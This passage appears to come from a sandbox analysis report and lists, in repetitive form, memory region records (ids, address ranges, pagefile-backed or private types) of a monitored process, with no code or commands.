entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 16842 start_va = 0x2100000 end_va = 0x210efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 16843 start_va = 0x2100000 end_va = 0x210efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 16844 start_va = 0x2100000 end_va = 0x210efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 16845 start_va = 0x2100000 end_va = 0x210efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 16846 start_va = 0x2100000 end_va = 0x210efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 16847 start_va = 0x2100000 end_va = 0x2100fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 16848 start_va = 0x2100000 end_va = 0x210ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002100000" filename = "" Region: id = 16849 start_va = 0x7770000 end_va = 0x778ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000007770000" filename = "" Region: id = 16850 start_va = 0x2100000 end_va = 0x210efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 16851 start_va = 0x2100000 end_va = 0x210efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 16852 start_va = 0x2100000 end_va = 0x210efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 16853 start_va = 0x2100000 end_va = 0x210efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 16854 start_va = 0x2100000 end_va = 0x210efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 16855 start_va = 0x2100000 end_va = 0x210efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 16856 start_va = 0x2100000 end_va = 0x210efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 16857 start_va = 0x2100000 end_va = 0x210efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 16858 start_va = 0x2100000 end_va = 0x210efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 16859 start_va = 0x2100000 end_va = 0x210efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 16860 start_va = 0x2100000 end_va = 0x210efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 16861 start_va = 0x2100000 end_va = 0x210efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 16862 start_va = 0x2100000 end_va = 0x210efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 16863 start_va = 0x2100000 end_va = 0x210efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 16864 start_va = 0x2100000 end_va = 0x210efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 16865 start_va = 0x2100000 end_va = 0x210efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 16866 start_va = 0x2100000 end_va = 0x210efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 16867 start_va = 0x2100000 end_va = 0x210efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 16868 start_va = 0x2100000 end_va = 0x210efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 16869 start_va = 0x2100000 end_va = 0x210efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 16870 start_va = 0x2100000 end_va = 0x210efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 16871 start_va = 0x2100000 end_va = 0x210efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 16872 start_va = 0x2100000 end_va = 0x210efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 16873 start_va = 0x2100000 end_va = 0x210efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 16874 start_va = 0x2100000 end_va = 0x210efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 16875 start_va = 0x2100000 end_va = 0x210efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 16876 start_va = 0x2100000 end_va = 0x210efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 16877 start_va = 0x2100000 end_va = 0x210efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 16878 start_va = 0x2100000 end_va = 0x210efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 16879 start_va = 0x2100000 end_va = 0x210efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 16880 start_va = 0x2100000 end_va = 0x210efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 16881 start_va = 0x2100000 end_va = 0x210efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 16882 start_va = 0x2100000 end_va = 0x210efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 16883 start_va = 0x2100000 end_va = 0x210efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 16884 start_va = 0x2100000 end_va = 0x210efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 16885 start_va = 0x2100000 end_va = 0x210efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 16886 start_va = 0x2100000 end_va = 0x210efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 16887 start_va = 0x2100000 end_va = 0x210efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 16888 start_va = 0x2100000 end_va = 0x210efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 16889 start_va = 0x2100000 end_va = 0x210efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 16890 start_va = 0x2100000 end_va = 0x210efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 16891 start_va = 0x2100000 end_va = 0x210efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 16892 start_va = 0x2100000 end_va = 0x210efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 16893 start_va = 0x2100000 end_va = 0x210efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 16894 start_va = 0x2100000 end_va = 0x210efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 16895 start_va = 0x2100000 end_va = 0x210efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 16896 start_va = 0x2100000 end_va = 0x210efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 16897 start_va = 0x2100000 end_va = 0x210efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 16898 start_va = 0x2100000 end_va = 0x210efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 16899 start_va = 0x2100000 end_va = 0x210efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 16900 start_va = 0x2100000 end_va = 0x210efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 16901 start_va = 0x2100000 end_va = 0x210efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 16902 start_va = 0x2100000 end_va = 0x210efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 16903 start_va = 0x2100000 end_va = 0x210efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 16904 start_va = 0x2100000 end_va = 0x210efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 16905 start_va = 0x2100000 end_va = 0x210efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 16906 start_va = 0x2100000 end_va = 0x210efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 16907 start_va = 0x2100000 end_va = 0x210efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 16908 start_va = 0x2100000 end_va = 0x210efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 16909 start_va = 0x2100000 end_va = 0x210efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 16910 start_va = 0x2100000 end_va = 0x210efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 16911 start_va = 0x2100000 end_va = 0x210efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 16912 start_va = 0x2100000 end_va = 0x210efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 16913 start_va = 0x2100000 end_va = 0x210efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 16914 start_va = 0x2100000 end_va = 0x210efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 16915 start_va = 0x2100000 end_va = 0x210efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 16916 start_va = 0x2100000 end_va = 0x210efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 16917 start_va = 0x2100000 end_va = 0x210efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 16918 start_va = 0x2100000 end_va = 0x210efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 16919 start_va = 0x2100000 end_va = 0x210efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 16920 start_va = 0x2100000 end_va = 0x210efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 16921 start_va = 0x2100000 end_va = 0x210efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 16922 start_va = 0x2100000 end_va = 0x210efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 16923 start_va = 0x2100000 end_va = 0x210efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 16924 start_va = 0x2100000 end_va = 0x210efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 16925 start_va = 0x2100000 end_va = 0x210efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 16926 start_va = 0x2100000 end_va = 0x210efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 16927 start_va = 0x2100000 end_va = 0x210efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 16928 start_va = 0x2100000 end_va = 0x210efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 16929 start_va = 0x2100000 end_va = 0x210efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 16930 start_va = 0x2100000 end_va = 0x210efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 16931 start_va = 0x2100000 end_va = 0x210efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 16932 start_va = 0x2100000 end_va = 0x210efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 16933 start_va = 0x2100000 end_va = 0x210efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 16934 start_va = 0x2100000 end_va = 0x210efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 16935 start_va = 0x2100000 end_va = 0x210efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 16936 start_va = 0x2100000 end_va = 0x210efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 16937 start_va = 0x2100000 end_va = 0x210efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 16938 start_va = 0x2100000 end_va = 0x210efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 16939 start_va = 0x2100000 end_va = 0x210efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 16940 start_va = 0x2100000 end_va = 0x210efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 16941 start_va = 0x2100000 end_va = 0x210efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 16942 start_va = 0x2100000 end_va = 0x210efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 16943 start_va = 0x2100000 end_va = 0x210efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 16944 start_va = 0x2100000 end_va = 0x210efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 16945 start_va = 0x2100000 end_va = 0x210efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 16946 start_va = 0x2100000 end_va = 0x210efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 16947 start_va = 0x2100000 end_va = 0x210efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 16948 start_va = 0x2100000 end_va = 0x210efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 16949 start_va = 0x2100000 end_va = 0x210efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 16950 start_va = 0x2100000 end_va = 0x210efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 16951 start_va = 0x2100000 end_va = 0x210efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 16952 start_va = 0x2100000 end_va = 0x210efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 16953 start_va = 0x2100000 end_va = 0x210efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 16954 start_va = 0x2100000 end_va = 0x210efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 16955 start_va = 0x2100000 end_va = 0x210efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 16956 start_va = 0x2100000 end_va = 0x210efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 16957 start_va = 0x2100000 end_va = 0x2100fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 16958 start_va = 0x2100000 end_va = 0x2106fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002100000" filename = "" Region: id = 16959 start_va = 0x4140000 end_va = 0x414ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004140000" filename = "" Region: id = 16960 start_va = 0xc870000 end_va = 0xcd62fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000c870000" filename = "" Region: id = 16961 start_va = 0x4140000 end_va = 0x415ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004140000" filename = "" Region: id = 16962 start_va = 0x41d0000 end_va = 0x41defff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000041d0000" filename = "" Region: id = 16963 start_va = 0x4140000 end_va = 0x414efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004140000" filename = "" Region: id = 16964 start_va = 0x4140000 end_va = 0x414efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004140000" filename = "" Region: id = 16965 start_va = 0x4140000 end_va = 0x414efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004140000" filename = "" Region: id = 16966 start_va = 0x4140000 end_va = 0x414efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004140000" filename = "" Region: id = 16967 start_va = 0x4140000 end_va = 0x414efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004140000" filename = "" Region: id = 16968 start_va = 0x4140000 end_va = 0x414efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004140000" filename = "" Region: id = 16969 start_va = 0x4140000 end_va = 0x414efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004140000" filename = "" Region: id = 16970 start_va = 0x4140000 end_va = 0x414efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004140000" filename = "" Region: id = 16971 start_va = 0x4140000 end_va = 0x414efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004140000" filename = "" Region: id = 16972 start_va = 0x4140000 end_va = 0x414efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004140000" filename = "" Region: id = 16973 start_va = 0x4140000 end_va = 0x414efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004140000" filename = "" Region: id = 16974 start_va = 0x4140000 end_va = 0x414efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004140000" filename = "" Region: id = 16975 start_va = 0x4140000 end_va = 0x414efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004140000" filename = "" Region: id = 16976 start_va = 0x4140000 end_va = 0x414efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004140000" filename = "" Region: id = 16977 start_va = 0x4140000 end_va = 0x414efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004140000" filename = "" Region: id = 16978 start_va = 0x4140000 end_va = 0x414efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004140000" filename = "" Region: id = 16979 start_va = 0x4140000 end_va = 0x414efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004140000" filename = "" Region: id = 16980 start_va = 0x4140000 end_va = 0x414efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004140000" filename = "" Region: id = 16981 start_va = 0x4140000 end_va = 0x414efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004140000" filename = "" Region: id = 16982 start_va = 0x4140000 end_va = 0x414efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004140000" filename = "" Region: id = 16983 start_va = 0x4140000 end_va = 0x414efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004140000" filename = "" Region: id = 16984 start_va = 0x4140000 end_va = 0x414efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004140000" filename = "" Region: id = 16985 start_va = 0x4140000 end_va = 0x414efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004140000" filename = "" Region: id = 16986 start_va = 0x4140000 end_va = 0x414efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004140000" filename = "" Region: id = 16987 start_va = 0x4140000 end_va = 0x414efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004140000" filename = "" Region: id = 16988 start_va = 0xe170000 end_va = 0xe661fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000e170000" filename = "" Region: id = 16989 start_va = 0x4140000 end_va = 0x414efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004140000" filename = "" Region: id = 16990 start_va = 0x4140000 end_va = 0x414efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004140000" filename = "" Region: id = 16991 start_va = 0x4140000 end_va = 0x414efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004140000" filename = "" Region: id = 16992 start_va = 0x4140000 end_va = 0x414efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004140000" filename = "" Region: id = 16993 start_va = 0x4140000 end_va = 0x414efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004140000" filename = "" Region: id = 16994 start_va = 0x4140000 end_va = 0x414efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004140000" filename = "" Region: id = 16995 start_va = 0x4140000 end_va = 0x414efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004140000" filename = "" Region: id = 16996 start_va = 0x4140000 end_va = 0x414efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004140000" filename = "" Region: id = 16997 start_va = 0x4140000 end_va = 0x414efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004140000" filename = "" Region: id = 16998 start_va = 0x4140000 end_va = 0x414efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004140000" filename = "" Region: id = 16999 start_va = 0x4140000 end_va = 0x414efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004140000" filename = "" Region: id = 17000 start_va = 0x4140000 end_va = 0x414efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004140000" filename = "" Region: id = 17001 start_va = 0x4140000 end_va = 0x414efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004140000" filename = "" Region: id = 17002 start_va = 0x4140000 end_va = 0x414efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004140000" filename = "" Region: id = 17003 start_va = 0x4140000 end_va = 0x414efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004140000" filename = "" Region: id = 17004 start_va = 0x4140000 end_va = 0x414efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004140000" filename = "" Region: id = 17005 start_va = 0x4140000 end_va = 0x414efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004140000" filename = "" Region: id = 17006 start_va = 0x4140000 end_va = 0x414efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004140000" filename = "" Region: id = 17007 start_va = 0x4140000 end_va = 0x414efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004140000" filename = "" Region: id = 17008 start_va = 0x4140000 end_va = 0x414efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004140000" filename = "" Region: id = 17009 start_va = 0x4140000 end_va = 0x414efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004140000" filename = "" Region: id = 17010 start_va = 0x4140000 end_va = 0x414efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004140000" filename = "" Region: id = 17011 start_va = 0x4140000 end_va = 0x414efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004140000" filename = "" Region: id = 17012 start_va = 0x4140000 end_va = 0x414efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004140000" filename = "" Region: id = 17013 start_va = 0x4140000 end_va = 0x414efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004140000" filename = "" Region: id = 17014 start_va = 0x4140000 end_va = 0x414efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004140000" filename = "" Region: id = 17015 start_va = 0x4140000 end_va = 0x414efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004140000" filename = "" Region: id = 17016 start_va = 0x4140000 end_va = 0x414efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004140000" filename = "" Region: id = 17017 start_va = 0x4140000 end_va = 0x414efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004140000" filename = "" Region: id = 17018 start_va = 0x4140000 end_va = 0x414efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004140000" filename = "" Region: id = 17019 start_va = 0x4140000 end_va = 0x414efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004140000" filename = "" Region: id = 17020 start_va = 0x4140000 end_va = 0x414efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004140000" filename = "" Region: id = 17021 start_va = 0x4140000 end_va = 0x414efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004140000" filename = "" Region: id = 17022 start_va = 0x4140000 end_va = 0x414efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004140000" filename = "" Region: id = 17023 start_va = 0x4140000 end_va = 0x414efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004140000" filename = "" Region: id = 17024 start_va = 0x4140000 end_va = 0x414efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004140000" filename = "" Region: id = 17025 start_va = 0x4140000 end_va = 0x414efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004140000" filename = "" Region: id = 17026 start_va = 0x4140000 end_va = 0x414efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004140000" filename = "" Region: id = 17027 start_va = 0x4140000 end_va = 0x414efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004140000" filename = "" Region: id = 17028 start_va = 0x4140000 end_va = 0x414efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004140000" filename = "" Region: id = 17029 start_va = 0x4140000 end_va = 0x414efff monitored = 1 entry_point = 0x0 